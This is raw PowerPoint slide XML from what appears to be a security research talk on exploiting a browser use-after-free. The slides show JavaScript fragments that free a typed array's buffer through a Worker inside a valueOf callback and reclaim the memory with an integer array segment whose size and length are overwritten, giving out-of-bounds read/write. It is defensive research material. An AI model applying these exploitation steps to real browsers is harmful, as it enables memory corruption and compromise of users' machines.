                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>] = 0x77;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>audioBuf</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>copyFromChannel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(t2,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>obj,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0);</a:t>
            </a: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endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>………</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>obj.valueOf</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> = function()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>{		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>work = new Worker(null);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>work.postMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(”66", [t2.buffer]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//Free the buffer of floating point array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>work.terminate</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>();	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>work = null;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>………</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{744230BE-8100-49A2-93AC-10926FA52A60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6522709" y="4000362"/>
            <a:ext cx="4685389" cy="44561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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B6F02E9-D698-4CCA-B616-B246B0686947}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078124" y="6767385"/>
            <a:ext cx="9627975" cy="2430288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{623B2FAC-9FB7-48F6-81D4-495AE51457E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="9354001"/>
            <a:ext cx="11228175" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>copyFromChannel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> copies the ta2 data to the released memory area, the program crashes</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2214198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Exploitation</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6FE69EA-3BF7-45EE-9300-381C9FAF3E1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1052036" y="2584359"/>
            <a:ext cx="10953455" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In this case, consider using segment of the integer array object to occupy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It can control the copied data and copy offsets</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It can aligns the freed buffer space with the </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>occupied</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> segment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It can accurately cover </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>segment.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>segment.size</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The modified occupied segment can be read and written across the boundary to achieve relative address reading and writing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7A5CAB8-B3B0-4B90-80A9-14596950F55E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="6055076"/>
            <a:ext cx="5106775" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var t</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>audioBuf</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.getChannelData</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var ta2 = new Uint8Array(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t.buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ta2[0] = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ta2[1] = 0x7fffffff;	//size</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ta2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[2] = 0xffffffff;	//length</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ta2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[3] = 0;		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ta2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[4] = 0;	//next</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ta2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[4] = 0;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70256FD7-1D5B-438E-A07C-830305F77961}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5804926" y="6183839"/>
            <a:ext cx="6252743" cy="1133675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5F803F8-6F37-4F7C-BADA-AFC4F9799C9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5804926" y="7676278"/>
            <a:ext cx="6200565" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The buffer of ta2 will cover the segment of an integer array, so that the segment can access the element out of bounds.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2478001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5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1617775" y="5157771"/>
            <a:ext cx="9874153" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jin Liu is a security researcher of McAfee IPS Research Team. Jin is mainly focused on vulnerability research, and he is specialized in vulnerability analysis and exploitation, with especially deep diving in browser vulnerability research on Windows platform.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10920599-4212-4A52-BE28-07C3D3136F71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1846487" y="946849"/>
            <a:ext cx="8907014" cy="862857"/>
            <a:chOff x="383732" y="909324"/>
            <a:chExt cx="12098995" cy="1172077"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="平行四边形 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A3A2B4E-E37C-4ADF-BCD5-BAC2CFFECAAD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="383732" y="909324"/>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00</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="平行四边形 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F454C145-DDC2-4C47-B1E7-B74D06ECD8CD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1853032" y="909324"/>
              <a:ext cx="10629695" cy="1172077"/>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5400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>Speaker Profile</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="202504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Exploitation</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADC1BF76-ECD3-4D7B-9D8B-F65955BF63FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2543619"/>
            <a:ext cx="4474853" cy="5632311"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Looking for the out of bounds array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pseudo code</a:t>
            </a:r>
